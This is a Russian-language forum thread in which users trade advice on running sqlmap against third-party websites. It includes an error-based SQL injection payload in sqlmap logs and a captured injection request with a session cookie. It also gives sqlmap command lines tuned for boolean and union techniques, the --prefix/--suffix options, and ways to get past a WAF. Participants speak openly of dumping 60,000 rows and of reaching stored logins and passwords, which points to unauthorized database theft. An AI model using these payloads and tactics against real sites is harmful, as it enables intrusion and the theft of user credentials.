 |
|
09.05.2017, 11:03
|
|
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
С нами:
5039606
Репутация:
1
|
|
[08:44:51] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2, PHP 5.5.38
back-end DBMS: MySQL >= 5.0
[08:44:51] [INFO] fetching database names
[08:44:51] [DEBUG] resuming configuration option 'code' (200)
[08:44:51] [DEBUG] searching for error chunk length...
[08:44:51] [PAYLOAD] 1 AND (SELECT 2283 FROM(SELECT COUNT(*),CONCAT(0x71786b7071,(SELECT REPEAT(0x34,1024)),0x716b6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
[08:45:22] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
[08:45:22] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')
[08:45:53] [DEBUG] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[08:46:23] [DEBUG] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[08:46:54] [CRITICAL] connection timed out to the target URL or proxy
[*] shutting down at 08:46:54
Не хочет мне бд показывать )) Уже и с прокси пробывал и тд.Что делать?
|
|
|
10.05.2017, 20:53
|
|
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
С нами:
5039606
Репутация:
1
|
|
Сообщение от spize0r
↑
Не понял, cms на php. На одном сайте проходит update, на другом нет. Как я понял завист от настройки на сервере? Но вопрос : может ли чтото измениться, если поиграться с параметрами, или это уже все?
Зависит от привилегий пользователя под которым ты сейчас.На первом сайте ты под админом на втором нет. --is-dba
|
|
|
|
11.05.2017, 15:25
|
|
Познающий
Регистрация: 02.04.2016
Сообщений: 40
С нами:
5323286
Репутация:
4
|
|
Сообщение от brown
↑
Зависит от привилегий пользователя под которым ты сейчас.На первом сайте ты под админом на втором нет. --is-dba
не соглашусь. --is-dba везде False. это влияет только на возможность работы с файловой системой. а вотредактирование записей в бд может быть может нет. возможно я как то не так запускаю тесты. хотлделал и с максимальными параметрами --level и --risk. все однно. одна и таже cms на разных хостингах . на одном редактирование проходят на других нет.
|
|
|
|
12.05.2017, 13:08
|
|
Новичок
Регистрация: 20.02.2016
Сообщений: 10
С нами:
5383766
Репутация:
0
|
|
Сообщение от RaWaS
↑
Неправильно вставляешь ссылку
Подскажи, как правильно ее вставлять в SQLMAP
Например, выдало вот такое:
Код:
GET /video.php?id=-1'%20OR%203*2*1%3d6%20AND%20000432%3d000432%20--%20 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://site.com/
Cookie: PHPSESSID=4n4rsiu4gpbich32fllrl26gr6
Host: site.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Как правильно вставить ссылку?
|
|
|
|
12.05.2017, 13:28
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами:
7502006
Репутация:
90
|
|
Сообщение от MollizZz
↑
Подскажи, как правильно ее вставлять в SQLMAP
Например, выдало вот такое:
Код:
GET /video.php?id=-1'%20OR%203*2*1%3d6%20AND%20000432%3d000432%20--%20 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://site.com/
Cookie: PHPSESSID=4n4rsiu4gpbich32fllrl26gr6
Host: site.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Как правильно вставить ссылку?
что то около того
-u 'site.com/video.php?id=-1' --cookie="PHPSESSID=4n4rsiu4gpbich32fllrl26gr6" --random-agent -v 3
если нужен вектор именно boolean то добавь ещё флаг --technique=B
|
|
|
|
12.05.2017, 13:32
|
|
Новичок
Регистрация: 20.02.2016
Сообщений: 10
С нами:
5383766
Репутация:
0
|
|
Сообщение от t0ma5
↑
что то около того
-u 'site.com/video.php?id=-1' --cookie="PHPSESSID=4n4rsiu4gpbich32fllrl26gr6" --random-agent -v 3
если нужен вектор именно boolean то добавь ещё флаг --technique=B
Пару часов назад спорил с одним товарищем по поводу техник
Суть спора, что техники надо использовать только EU, так как то же самый --technique=B доступ к БД и колонкам откроет, но сливать колонки будет по 1 символу в 2-3 секунды
Он рекомендует только --technique=EU
Так ли это?
|
|
|
|
12.05.2017, 13:34
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами:
7502006
Репутация:
90
|
|
Сообщение от MollizZz
↑
Пару часов назад спорил с одним товарищем по поводу техник
Суть спора, что техники надо использовать только EU, так как то же самый --technique=B доступ к БД и колонкам откроет, но сливать колонки будет по 1 символу в 2-3 секунды
Он рекомендует только --technique=EU
Так ли это?
любая техника достаёт информацию из базы, вопрос только во времени
|
|
|
|
12.05.2017, 13:38
|
|
Новичок
Регистрация: 20.02.2016
Сообщений: 10
С нами:
5383766
Репутация:
0
|
|
Сообщение от t0ma5
↑
любая техника достаёт информацию из базы, вопрос только во времени
Я лично вчера проводил эксперимент с одним сайтом
Без каких либо техник уязвимость была вскрыта. Доступ к БД был открыт (правда начало сливать 1 символ в несколько секунд)
С --technique=EU - не вскрыл
Сайтец хороший, но те же самые 60к строк нужных колонок будет сливать месяц точно. Забросил в итоге
|
|
|
|
12.05.2017, 13:49
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами:
7502006
Репутация:
90
|
|
Сообщение от MollizZz
↑
Я лично вчера проводил эксперимент с одним сайтом
Без каких либо техник уязвимость была вскрыта. Доступ к БД был открыт (правда начало сливать 1 символ в несколько секунд)
С --technique=EU - не вскрыл
Сайтец хороший, но те же самые 60к строк нужных колонок будет сливать месяц точно. Забросил в итоге
sqlmap не всегда сам нормально находит реализацию union вектору, лучше ему подсказывать
--union-cols количество колонок
--prefix --suffix начало и конец строки для инъекции
может там waf был, зря забросил, нужно было попробовать раскрутить скуль руками
"но те же самые 60к строк нужных колонок будет сливать месяц точно" стоило попробовать получить полноценный доступ к бд поискав другие лазейки, к тому же какой никакой доступ к базе есть, а там зачастую хранятся логины/пароли
|
|
|
|
12.05.2017, 13:54
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 0
С нами:
8581933
Репутация:
0
|
|
Сообщение от t0ma5
↑
sqlmap не всегда сам нормально находит реализацию union вектору, лучше ему подсказывать
--union-cols количество колонок
--prefix --suffix начало и конец строки для инъекции
может там waf был, зря забросил, нужно было попробовать раскрутить скуль руками
"но те же самые 60к строк нужных колонок будет сливать месяц точно" стоило попробовать получить полноценный доступ к бд поискав другие лазейки, к тому же какой никакой доступ к базе есть, а там зачастую хранятся логины/пароли
Кхм , можешь обьяснить на примере самой обычной скули ,как правильно юзать --prefix --suffix
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
